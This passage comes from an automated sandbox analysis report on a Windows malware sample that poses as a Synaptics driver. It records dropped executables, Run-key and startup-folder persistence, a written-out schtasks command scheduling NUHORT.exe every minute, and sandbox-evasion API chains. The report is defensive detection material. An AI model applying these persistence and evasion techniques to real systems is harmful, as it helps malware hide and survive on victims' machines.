                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0020CB5D push edi; ret 7_2_0020CB5F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0020CC76 push esi; ret 7_2_0020CC78
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0020CE51 push esi; ret 7_2_0020CE53
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0020CF3A push edi; ret 7_2_0020CF3C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00207795 push ecx; ret 7_2_002077A8
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0022BB9D push FFFFFF8Bh; iretd 7_2_0022BB9F
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E5020C pushfd ; retf 16_2_00E50215
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E6C6CC push esi; ret 16_2_00E6C6CE
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E2CB5D push edi; ret 16_2_00E2CB5F
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E2CC76 push esi; ret 16_2_00E2CC78
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E2CE51 push esi; ret 16_2_00E2CE53
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E2CF3A push edi; ret 16_2_00E2CF3C
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E27795 push ecx; ret 16_2_00E277A8
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E4BB9D push FFFFFF8Bh; iretd 16_2_00E4BB9F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0023020C pushfd ; retf 22_2_00230215
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0024C6CC push esi; ret 22_2_0024C6CE
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0020CB5D push edi; ret 22_2_0020CB5F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0020CC76 push esi; ret 22_2_0020CC78
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0020CE51 push esi; ret 22_2_0020CE53
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0020CF3A push edi; ret 22_2_0020CF3C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_00207795 push ecx; ret 22_2_002077A8
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0022BB9D push FFFFFF8Bh; iretd 22_2_0022BB9F
                                Source: initial sampleStatic PE information: section name: UPX0
                                Source: initial sampleStatic PE information: section name: UPX1
                                Source: initial sampleStatic PE information: section name: UPX0
                                Source: initial sampleStatic PE information: section name: UPX1

                                Persistence and Installation Behavior

                                barindex
                                Drops PE files to the document folder of the user
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\ProgramData\Synaptics\RCX4F1F.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeFile created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exeJump to dropped file
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\ProgramData\Synaptics\RCX4F1F.tmpJump to dropped file
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file

                                Boot Survival

                                barindex
                                Drops PE files to the startup folder
                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeJump to dropped file
                                Uses schtasks.exe or at.exe to add and modify task schedules
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn VFNCBO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1
                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VFNCBO.lnkJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VFNCBOJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VFNCBOJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001FF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,7_2_001FF78E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00247F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,7_2_00247F0E
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E1F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,16_2_00E1F78E
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E67F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,16_2_00E67F0E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_001FF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,22_2_001FF78E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_00247F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,22_2_00247F0E
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E21E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,16_2_00E21E5A
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Found API chain indicative of sandbox detection
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_7-104723
                                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeWindow / User API: threadDelayed 4608Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeWindow / User API: foregroundWindowGot 1299Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeEvaded block: after key decisiongraph_7-102965
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeAPI coverage: 6.6 %
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeAPI coverage: 3.8 %
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeAPI coverage: 3.8 %
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe TID: 5544Thread sleep time: -46080s >= -30000sJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7192Thread sleep count: 156 > 30Jump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7192Thread sleep time: -9360000s >= -30000sJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 9320Thread sleep time: -60000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeLast function: Thread delayed
                                Source: C:\ProgramData\Synaptics\Synaptics.exeLast function: Thread delayed
                                Source: C:\ProgramData\Synaptics\Synaptics.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeThread sleep count: Count: 4608 delay: -10Jump to behavior
                                Source: Yara matchFile source: 0000000C.00000002.2962021382.0000000002B1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.2962613368.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.2962021382.0000000002AFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 4268, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\VFNCBO.vbs, type: DROPPED
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001FDD92 GetFileAttributesW,FindFirstFileW,FindClose,7_2_001FDD92
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00232044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_00232044
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0023219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_0023219F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_002324A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,7_2_002324A9
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00226B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,FindNextFileW,FindClose,FindClose,7_2_00226B3F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00226E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,FindNextFileW,FindClose,7_2_00226E4A
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0022F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,7_2_0022F350
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0022FD47 FindFirstFileW,FindClose,7_2_0022FD47
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_0022FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,7_2_0022FDD2
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E52044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00E52044
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E5219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00E5219F
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E524A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,16_2_00E524A9
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E46B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,16_2_00E46B3F
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E46E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,16_2_00E46E4A
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E4F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,16_2_00E4F350
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E4FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,16_2_00E4FDD2
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E1DD92 GetFileAttributesW,FindFirstFileW,FindClose,16_2_00E1DD92
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 16_2_00E4FD47 FindFirstFileW,FindClose,16_2_00E4FD47
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_00232044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,22_2_00232044
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0023219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,22_2_0023219F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_002324A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,22_2_002324A9
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_00226B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,22_2_00226B3F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_00226E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,22_2_00226E4A
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0022F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,22_2_0022F350
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0022FD47 FindFirstFileW,FindClose,22_2_0022FD47
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_001FDD92 GetFileAttributesW,FindFirstFileW,FindClose,22_2_001FDD92
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 22_2_0022FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,22_2_0022FDD2
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_001FE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,7_2_001FE47B
                                Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.iniJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
